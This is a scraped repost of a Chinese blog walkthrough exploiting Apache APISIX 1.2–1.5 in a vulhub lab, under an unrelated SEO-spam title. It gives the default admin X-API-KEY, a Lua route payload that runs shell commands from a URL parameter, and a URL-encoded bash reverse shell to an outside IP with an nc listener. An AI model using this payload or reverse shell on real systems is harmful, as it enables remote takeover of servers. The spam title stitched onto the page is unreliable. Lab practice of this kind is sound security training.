当前位置: 首页> 游戏> 手游 > 限制高消费可以去环球影城吗_广州冼村凶杀案现场图片_百度app下载安装 官方_seo自然排名

限制高消费可以去环球影城吗_广州冼村凶杀案现场图片_百度app下载安装 官方_seo自然排名

时间:2025/7/9 5:25:25来源:https://blog.csdn.net/2301_78721909/article/details/145890406 浏览次数:0次
限制高消费可以去环球影城吗_广州冼村凶杀案现场图片_百度app下载安装 官方_seo自然排名

一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

漏洞范围

Apache APISIX 1.2~1.5

二、访问靶机IP 9080端口

1、拼接apisix/admin/routes路由

发现其特征为failed to check token

2、抓取当前页面的包,并修改为post请求,添加以下payload

X-API-KEY: edd1c9f034335f136f87ad84b625c8f1  请求头部添加内容{"uri": "/test",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}
}

三、获取系统权限

1、此时,我们访问添加成功的恶意路由文件test,可以进行命令执行

2、既然可以执行命令,尝试执行反弹shell语句

bash%20-i%20%3E%26%20/dev/tcp/47.121.133.57/6666%200%3E%261  这里需要url编码

3、nc监听6666端口

至此,权限成功拿下。

下期再见,家人们。

关键字:限制高消费可以去环球影城吗_广州冼村凶杀案现场图片_百度app下载安装 官方_seo自然排名

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: